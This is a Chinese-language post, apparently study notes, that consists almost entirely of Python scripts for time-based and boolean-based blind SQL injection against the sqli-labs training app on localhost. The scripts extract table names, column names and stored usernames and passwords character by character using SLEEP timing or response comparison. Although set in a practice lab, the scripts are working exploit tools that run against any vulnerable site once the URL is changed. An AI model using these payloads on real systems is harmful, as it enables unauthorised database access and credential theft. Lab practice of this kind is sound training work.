时间盲注，boolen盲注，获取表、列、具体数据的函数

时间盲注：

获取表：

import requests import time url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php" delay = 2 def is_injected(payload): start = time.time() try: requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay+1) except requests.exceptions.Timeout: return True return time.time() - start > delay table = [] for pos in range(1, 30): for c in range(32, 127): payload = f"IF(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1),{pos},1))={c},SLEEP({delay}),0)" if is_injected(payload): table.append(chr(c)) print("".join(table)) break else: break print("".join(table))

获取列：

import requests import time url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php" delay = 2 table_name = "emails" def is_injected(payload): start = time.time() try: requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay + 1) except requests.exceptions.Timeout: return True return time.time() - start > delay column = [] for pos in range(1, 30): for c in range(32, 127): payload = f"IF(ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' LIMIT 1),{pos},1))={c},SLEEP({delay}),0)" if is_injected(payload): column.append(chr(c)) print("".join(column)) break else: break print(''.join(column))

获取具体数据：

import requests import time url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php" delay = 2 # table_name = "emails" column_name = "id" def is_injected(payload): start = time.time() try: requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay + 1) except requests.exceptions.Timeout: return True return time.time() - start > delay data = [] for pos in range(1, 50): for c in range(32, 127): payload = f"IF(ASCII(SUBSTR((SELECT {column_name} FROM {table_name} LIMIT 1),{pos},1))={c},SLEEP({delay}),0)" if is_injected(payload): data.append(chr(c)) print("".join(data)) break else: break print(''.join(data))

boolen盲注：

获取表：

import requests url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27' payload = 'and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=' \ 'database()%20limit%20{t},1),{w},1))={A}%20--%20k' list1 = [64, 94, 96, 124, 176, 40, 41, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 173, 175, 95, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 44] str1 = "You are in..........." str2 = bytes(str1, 'utf-8') tables1 = '' tables2 = '' tables3 = '' tables4 = '' for i in range(0, 4): for j in range(1, 10): for s in list1: p = payload.format(t=i, w=j, A=s) u = requests.get(url+p) if str2 in u.content: if i == 0: tables1 += chr(s) print (u"正在对比第1个表,", u"第", j, u"个字符",tables1) elif i == 1: tables2 += chr(s) print (u"正在对比第2个表,", u"第", j, u"个字符", tables2) elif i == 2: tables3 += chr(s) print (u"正在对比第3个表,", u"第", j, u"个字符", tables3) elif i == 3: tables4 += chr(s) print (u"正在对比第4个表,", u"第", j, u"个字符", tables4) break print ('tables1-->', tables1) print ('tables2-->', tables2) print ('tables3-->', tables3) print ('tables4-->', tables4)

获取列：

import requests list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '.'] url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27' payload = '%20and%20left((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security' \ '%27%20and%20table_name=%27users%27%20limit%20{w},1),{n})=%27{c}%27%20--%20k' column = ['', '', '', '', ''] str1 = 'You are in...........' str2 = bytes(str1, 'utf-8') for j in range(0, 3): for i in range(1, 9): for l in list1: p = payload.format(w=j, n=i, c=column[j]+l) u = requests.get(url+p) if str2 in u.content: column[j] += l print (u'正在对比第', j+1, u'个字段第', i, u'个字符', column[j]) break for c in range(0, 5): print ('column', c+1, '-->', column[c])

获取具体数据：

import requests list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '.'] url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27' payload = '%20and%20left((select%20username%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k' str1 = 'You are in...........' str2 = bytes(str1, 'utf-8') username = ['', '', '', '', '', '', '', '', '', '', '', '', '', ''] password = ['', '', '', '', '', '', '', '', '', '', '', '', '', ''] for i in range(1, 15): for j in range(1, 11): for l in list1: p = payload.format(n=i, w=j, d=username[i-1]+l) u = requests.get(url+p) if str2 in u.content: username[i-1] += l print (u'正在对比第', i, u'个记录的username的第', j, u'个字符', username[i-1]) payload2 = '%20and%20left((select%20password%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k' for i in range(1, 15): for j in range(1, 11): for l in list1: p = payload2.format(n=i, w=j, d=password[i-1]+l) u = requests.get(url+p) if str2 in u.content: password[i-1] += l print (u'正在对比第', i, u'个记录的password的第', j, u'个字符', password[i-1]) print ('id username password') for i in range(1, 15): print (i, '-', username[i-1], '-', password[i-1])